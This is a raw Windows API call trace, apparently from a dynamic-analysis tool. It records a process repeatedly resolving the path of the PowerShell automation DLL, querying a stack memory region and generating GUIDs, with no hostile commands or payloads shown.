	[0111.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.798] VirtualQuery (in: lpAddress=0xcbb30, lpBuffer=0xcc9f0, dwLength=0x30 | out: lpBuffer=0xcc9f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.800] VirtualQuery (in: lpAddress=0xcbb30, lpBuffer=0xcc9f0, dwLength=0x30 | out: lpBuffer=0xcc9f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.800] VirtualQuery (in: lpAddress=0xcbb30, lpBuffer=0xcc9f0, dwLength=0x30 | out: lpBuffer=0xcc9f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.801] VirtualQuery (in: lpAddress=0xcb220, lpBuffer=0xcc0e0, dwLength=0x30 | out: lpBuffer=0xcc0e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.801] VirtualQuery (in: lpAddress=0xcb2b0, lpBuffer=0xcc170, dwLength=0x30 | out: lpBuffer=0xcc170*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.802] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.802] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.802] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.803] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.803] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.803] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.803] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.803] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.803] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.804] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.804] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.804] VirtualQuery (in: lpAddress=0xcb660, lpBuffer=0xcc520, dwLength=0x30 | out: lpBuffer=0xcc520*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.804] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.805] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.805] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.805] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.806] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x94603f5e, Data2=0xc30d, Data3=0x40da, Data4=([0]=0x84, [1]=0x52, [2]=0x58, [3]=0xf0, [4]=0x6, [5]=0x17, [6]=0xd4, [7]=0x2b))) returned 0x0
	[0111.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.807] VirtualQuery (in: lpAddress=0xcb220, lpBuffer=0xcc0e0, dwLength=0x30 | out: lpBuffer=0xcc0e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.808] VirtualQuery (in: lpAddress=0xcb2b0, lpBuffer=0xcc170, dwLength=0x30 | out: lpBuffer=0xcc170*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.808] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.809] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xe10f1cf3, Data2=0xe0a1, Data3=0x4846, Data4=([0]=0x9c, [1]=0x15, [2]=0x37, [3]=0xdd, [4]=0xa0, [5]=0x9d, [6]=0x67, [7]=0x97))) returned 0x0
	[0111.809] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x62fc3152, Data2=0x3903, Data3=0x49a4, Data4=([0]=0x84, [1]=0x2, [2]=0x96, [3]=0x31, [4]=0xca, [5]=0x81, [6]=0x24, [7]=0x7d))) returned 0x0
	[0111.810] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x93e75934, Data2=0xe1a9, Data3=0x4fa2, Data4=([0]=0x8f, [1]=0x88, [2]=0x7a, [3]=0x1d, [4]=0x64, [5]=0x63, [6]=0x6, [7]=0xe8))) returned 0x0
	[0111.810] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x87a55af8, Data2=0xb1bc, Data3=0x4dfc, Data4=([0]=0x9b, [1]=0xdc, [2]=0x6a, [3]=0x76, [4]=0xe9, [5]=0x1b, [6]=0x53, [7]=0xdb))) returned 0x0
	[0111.811] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x8557e0bc, Data2=0x8aac, Data3=0x4611, Data4=([0]=0x81, [1]=0x30, [2]=0xad, [3]=0xa1, [4]=0x6e, [5]=0xe9, [6]=0x84, [7]=0x6b))) returned 0x0
	[0111.811] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x2ec76df5, Data2=0xccaf, Data3=0x4d8e, Data4=([0]=0x89, [1]=0xd9, [2]=0x92, [3]=0xe4, [4]=0x64, [5]=0xa7, [6]=0x80, [7]=0xd4))) returned 0x0
